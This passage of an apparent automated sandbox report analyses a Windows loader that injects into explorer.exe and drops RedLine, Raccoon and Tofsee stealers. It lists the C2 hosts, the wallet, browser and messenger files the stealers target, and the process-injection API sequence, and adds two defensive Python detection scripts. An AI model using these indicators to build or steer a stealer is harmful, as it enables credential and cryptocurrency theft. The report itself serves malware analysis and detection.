Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Thread created: C:\Windows\explorer.exe EIP: 2DC1A20
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Thread created: unknown EIP: 4151A20
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
Source: C:\Users\user\AppData\Roaming\ecrjwib Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\757C.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_004014CC GetSystemTimeAsFileTime,_ftell,_fseek,
Source: 8433.exe, 00000013.00000002.697272748.0000000006C5B000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: Electrum
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqliteUnknownExtension\Program Files (x86)\configArmorydisplayNamehost_keyNametdataSELECT * FROM \EWarningxodWarningusexpires_utc\Program Data\coMANGOokies.sqMANGOliteAFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct*ssfn*DisplayVersion%localappdata%\-*.lo--gLocalPrefs.jsonOpHandlerenVPHandlerN ConHandlernect%DSK_23%cmdOpera GXcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenterROOT\SecurityCenter2Web DataSteamPathwaasflleasft.datasfCommandLine\Telegram Desktop\tdataSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesTotalVisibleMemorySizeis_secureSoftware\Valve\SteamLogin DataID: isSecureegram.exeNoDefrdDefVPNDefwaasflletasf%useStringBuilderrproStringBuilderfile%\DStringBuilderocuStringBuildermeStringBuilderntsv11\Program Files\\ElBPOTE6AJIectruBPOTE6AJIm\wallBPOTE6AJIetsOpera GX StableSELECT * FROM Win32_Process Where SessionId='*.json\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnameProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueLocal Extension SettingsNWinordVWinpn.eWinxe*WinhostEWarningxodWarningusmoz_cookiesUser Datawindows-1251, CommandLine: \CCollectionoinCollectionomCollectioniDisplayName*.walletexpiry\EExceptionxodExceptionus\exodExceptionus.walExceptionletTel*.vstring.ReplacedfJaxxpath
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: \Ethereum\wallets
Source: svchost.exe, 0000000D.00000003.459986955.000001D408BC9000.00000004.00000001.sdmp String found in binary or memory: 2\r\n" \tResident Evil 2\r\n" \tMetro Exodus\r\n" \tForza Horizon 4\r\n" \tAnd more & \r\n \r\nMOVIES AND TV\r\nGo inside the story with immersive audio for your favorite shows and movies. Find Dolby Atmos content on:\r\n" \tNetflix"!\r\n" \tDisney+\r\n" \tMicrosoft Movies & TV\r\n" \tAmazon Prime Video\r\n" \tiQiyi\r\n" \tVUDU
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: Ethereum(Xq
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 8433.exe String found in binary or memory: set_UseMachineKeyStore
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

The report's matrix has one column per tactic and one technique per row. Techniques the sandbox actually observed carry a signature-count badge, reproduced here in brackets exactly as extracted; entries without a badge are the matrix's empty placeholder cells.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API [1], Exploitation for Client Execution [1], Command and Scripting Interpreter [2], At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Privilege Escalation: Process Injection [512], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Defense Evasion: Disable or Modify Tools [1], Obfuscated Files or Information [2], Software Packing [13], Timestomp [1], File Deletion [1], Masquerading [11], Virtualization/Sandbox Evasion [441], Process Injection [512], Hidden Files and Directories [1]
Credential Access: Input Capture [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1], System Information Discovery [124], Query Registry [1], Security Software Discovery [841], Process Discovery [2], Virtualization/Sandbox Evasion [441], Application Window Discovery [1], Remote System Discovery [1], System Network Connections Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data [1], Data from Local System [1], Input Capture [1], Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Web Service [1], Ingress Tool Transfer [13], Encrypted Channel [11], Non-Standard Port [11], Non-Application Layer Protocol [4], Application Layer Protocol [25], Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

                    Behavior Graph

Behavior Graph ID: 491658; Sample: pAWNholT8X.exe; Start date: 27/09/2021; Architecture: WINDOWS; Score: 100

Network contacts attached to the top node:
  194.180.174.100 (ports 49843, 80), MIVOCLOUDMD, location unknown
  t.me 149.154.167.99 (ports 443, 49837), TELEGRAMRU, United Kingdom
  3 other IPs or domains

Signatures attached to the top node:
  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Antivirus detection for URL or domain
  Multi AV Scanner detection for submitted file
  11 other signatures

Process tree (indentation is parent/child; numbers in parentheses are the graph's created-files/registry-values badge, reproduced as extracted):

pAWNholT8X.exe (started)
  Detected unpacking (changes PE section rights)
  pAWNholT8X.exe (child, started)
    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
    Maps a DLL or memory area into another process
    Checks if the current machine is a virtual machine (disk enumeration)
    Creates a thread in another existing process (thread injection)
    explorer.exe (injected; 14)
      Network: 216.128.137.31 port 80, AS-CHOOPAUS, United States
      Network: privacy-toolz-for-you-403.top 194.147.85.186 (ports 49767, 49768, 49771), NETRACK-ASRU, Russian Federation
      Network: 11 other IPs or domains
      Dropped: C:\Users\user\AppData\Roaming\ecrjwib, PE32
      Dropped: C:\Users\user\AppData\Local\Temp\FE25.exe, PE32
      Dropped: C:\Users\user\AppData\Local\Temp\CEB6.exe, PE32
      Dropped: 5 other files (4 malicious)
      System process connects to network (likely due to code injection or exploit)
      Benign windows process drops PE files
      Deletes itself after installation
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      6CB1.exe (started)
        Detected unpacking (changes PE section rights)
        Injects a PE file into a foreign processes
        6CB1.exe (child, started)
          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
          Maps a DLL or memory area into another process
          Checks if the current machine is a virtual machine (disk enumeration)
          Creates a thread in another existing process (thread injection)
      8433.exe (started; 3)
        Query firmware table information (likely to detect VMs)
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Hides threads from debuggers
        Tries to detect sandboxes / dynamic malware analysis system (registry check)
        conhost.exe (started)
      757C.exe (started; 2)
        Antivirus detection for dropped file
        Machine Learning detection for dropped file
        757C.exe (child, started; 2)
        conhost.exe (started)
ecrjwib (started from the top node)
  Contains functionality to inject code into remote processes
  Injects a PE file into a foreign processes
svchost.exe (started; 1)
3 other processes
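The tree above is the classic loader pattern: an injected explorer.exe writes PE files under %APPDATA% and %TEMP%, reaches out to the network, and then starts what it dropped. As an added example written for this page (not Joe Sandbox code and not the sample's), the Python below correlates Sysmon-style FileCreate (EventID 11), NetworkConnect (EventID 3) and ProcessCreate (EventID 1) records per PID to flag exactly that sequence. The event records, PIDs, timestamps and the two benign decoy events are constructed; only the Sysmon field names are real.

```python
"""Correlate Sysmon-style events to catch a Windows system process that drops
files into user-writable paths and then runs them or talks to the Internet.

Added example for this page, not Joe Sandbox code. The event records are
constructed to mirror the behaviour graph (injected explorer.exe dropping
ecrjwib and 757C.exe, connecting out, then starting 757C.exe); field names
follow the Sysmon schema, all values are made up for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Set

# Processes that should never write a new file under %APPDATA%/%TEMP% and then
# execute it. Keep the set small; every name added is a source of noise.
SYSTEM_PROCESSES = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe", "dwm.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int        # PID of the system process that misbehaved
    image: str      # its image path
    detail: str     # file it launched or destination it connected to


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    return any(hint in path.lower() for hint in USER_WRITABLE)


def detect(events: List[Dict]) -> List[Finding]:
    """Replay events in time order, remember per PID which files a system
    process wrote into user-writable paths, and alert on the follow-up."""
    dropped: Dict[int, Set[str]] = {}
    findings: List[Finding] = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        eid, pid, image = ev["EventID"], ev["ProcessId"], ev["Image"]
        if eid == 11:
            if _basename(image) in SYSTEM_PROCESSES and _user_writable(ev["TargetFilename"]):
                dropped.setdefault(pid, set()).add(ev["TargetFilename"].lower())
        elif eid == 3:
            # A system process that has just written to %TEMP% and now reaches a
            # public address is the "system process connects to network" pattern.
            if pid in dropped and ip_address(ev["DestinationIp"]).is_global:
                findings.append(Finding("system_process_drops_then_connects", pid, image,
                                        f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif eid == 1:
            # Sysmon 1: Image is the new process, ParentProcessId its creator.
            parent = ev["ParentProcessId"]
            if parent in dropped and image.lower() in dropped[parent]:
                findings.append(Finding("system_process_executes_dropped_file", parent,
                                        ev["ParentImage"], image))
    return findings


# Constructed sample telemetry (not from the report's sandbox run).
SAMPLE_EVENTS = [
    {"UtcTime": "2021-09-27 10:00:01.000", "EventID": 11, "ProcessId": 4212,
     "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\user\\AppData\\Roaming\\ecrjwib"},
    {"UtcTime": "2021-09-27 10:00:02.000", "EventID": 11, "ProcessId": 4212,
     "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Temp\\757C.exe"},
    {"UtcTime": "2021-09-27 10:00:03.000", "EventID": 3, "ProcessId": 4212,
     "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "194.147.85.186", "DestinationPort": 80},
    {"UtcTime": "2021-09-27 10:00:04.000", "EventID": 1, "ProcessId": 6664,
     "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\757C.exe",
     "ParentProcessId": 4212, "ParentImage": "C:\\Windows\\explorer.exe"},
    # Decoys: a browser writing its own updater, and svchost talking to an internal host.
    {"UtcTime": "2021-09-27 10:00:05.000", "EventID": 11, "ProcessId": 900,
     "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"},
    {"UtcTime": "2021-09-27 10:00:06.000", "EventID": 3, "ProcessId": 1200,
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule}: pid {f.pid} ({f.image}) -> {f.detail}")
```

Explorer does legitimately reach public addresses, so in production the network rule needs an allow-list of known update and telemetry destinations; the execute-dropped-file rule is the low-noise one and on its own already covers the explorer.exe to 6CB1.exe/8433.exe/757C.exe hops in the graph.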


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

Source | Detection | Scanner | Label
pAWNholT8X.exe | 36% | Virustotal | -
pAWNholT8X.exe | 40% | ReversingLabs | Win32.Trojan.Racealer

                    Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\757C.exe | 100% | Avira | HEUR/AGEN.1106254
C:\Users\user\AppData\Local\Temp\CEB6.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\757C.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\FE25.exe | 100% | Joe Sandbox ML | -

                    Unpacked PE Files

Source | Detection | Scanner | Label
4.1.pAWNholT8X.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.1.pAWNholT8X.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.1.6CB1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.757C.exe.490000.1.unpack | 100% | Avira | HEUR/AGEN.1106254
17.2.757C.exe.800000.0.unpack | 100% | Avira | HEUR/AGEN.1106254
20.2.6CB1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.1.ecrjwib.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.1.6CB1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.0.757C.exe.490000.0.unpack | 100% | Avira | HEUR/AGEN.1106254
17.0.757C.exe.800000.0.unpack | 100% | Avira | HEUR/AGEN.1106254
4.2.pAWNholT8X.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
http://tempuri.org/Endpoint/PartInstalledSoftwares | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartNordVPN | 0% | Avira URL Cloud | safe
http://tempuri.org/ | 2% | Virustotal | -
http://tempuri.org/ | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/ConfirmResponseP | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartDiscord | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP | 0% | Avira URL Cloud | safe
http://geenaldencia9.top/ | 100% | Avira URL Cloud | malware
http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartInstalledBrowsersResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartColdWalletsResponse | 0% | Avira URL Cloud | safe
http://194.180.174.100/ | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartProtonVPNResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartDiscordResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartFtpConnectionsResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartOpenVPN | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartOpenVPNResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/GetUpdatesResponsensesResponseoon | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartProtonVPN | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartHardwaresResponse | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/PartTelegramFilesResponse | 0% | Avira URL Cloud | safe
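tempuri.org is the default namespace a .NET WCF service contract gets when the developer never sets one, so a URL-reputation feed rating http://tempuri.org/... as "safe" says nothing about the binary. The informative part is the operation name at the end of each path (PartColdWallets, PartNordVPN, PartTelegramFiles and so on), which spells out what the client, attributed to RedLine by the Yara matches above, is built to collect. The following Python is an added example written for this page, not code from the report or from the malware: it sorts a memory-string URL list into WS-* schema noise, tempuri.org actions and external hosts, then reduces the actions to their collection targets. The input list is assembled from URLs in this section; the function and constant names are my own.

```python
"""Triage URL strings recovered from process memory.

Added example for this page, not Joe Sandbox or RedLine code. The sample URL
list is assembled from the report's own strings; helper names are assumptions."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Schema namespaces emitted by the .NET WCF stack; present in any WCF client.
FRAMEWORK_HOSTS = {"schemas.xmlsoap.org", "docs.oasis-open.org", "www.w3.org",
                   "schemas.microsoft.com"}
# Default namespace of a WCF service contract that never set one. Harmless as a
# host, which is why URL-reputation feeds rate these "safe".
DEFAULT_CONTRACT_HOST = "tempuri.org"


def classify(urls: List[str]) -> Dict[str, List[str]]:
    """Split URL strings into framework noise, SOAP action names and external hosts."""
    buckets: Dict[str, List[str]] = {"framework": [], "soap_actions": [], "external": []}
    for url in urls:
        parsed = urlparse(url.strip())
        host = parsed.netloc.lower()
        if host in FRAMEWORK_HOSTS:
            buckets["framework"].append(url)
        elif host == DEFAULT_CONTRACT_HOST:
            action = parsed.path.rsplit("/", 1)[-1]
            if action:                      # skip the bare "http://tempuri.org/"
                buckets["soap_actions"].append(action)
        else:
            buckets["external"].append(url)
    return buckets


# Operation names look like Part<Target> (request) / Part<Target>Response (reply).
# Memory strings are often truncated or fused with neighbours ("...ResponseP"),
# so anything after "Response" is ignored rather than treated as a new name.
_PART_RE = re.compile(r"Part([A-Z][A-Za-z]*?)(?:Response.*)?")


def collection_targets(actions: List[str]) -> List[str]:
    """Collapse request/response pairs to the thing being collected."""
    targets = set()
    for action in actions:
        m = _PART_RE.fullmatch(action)
        if m:
            targets.add(m.group(1))
    return sorted(targets)


# Constructed from URLs listed in this section of the report.
SAMPLE_URLS = [
    "http://schemas.xmlsoap.org/ws/2005/02/sc/sct",
    "http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue",
    "http://tempuri.org/Endpoint/PartInstalledSoftwares",
    "http://tempuri.org/Endpoint/PartNordVPN",
    "http://tempuri.org/",
    "http://tempuri.org/Endpoint/ConfirmResponseP",
    "http://tempuri.org/Endpoint/PartDiscord",
    "http://tempuri.org/Endpoint/SetEnvironment",
    "http://tempuri.org/Endpoint/SetEnvironmentResponse",
    "http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP",
    "http://tempuri.org/Endpoint/VerifyUpdate",
    "http://tempuri.org/Endpoint/PartInstalledBrowsersResponse",
    "http://tempuri.org/Endpoint/PartColdWalletsResponse",
    "http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse",
    "http://tempuri.org/Endpoint/PartProtonVPNResponse",
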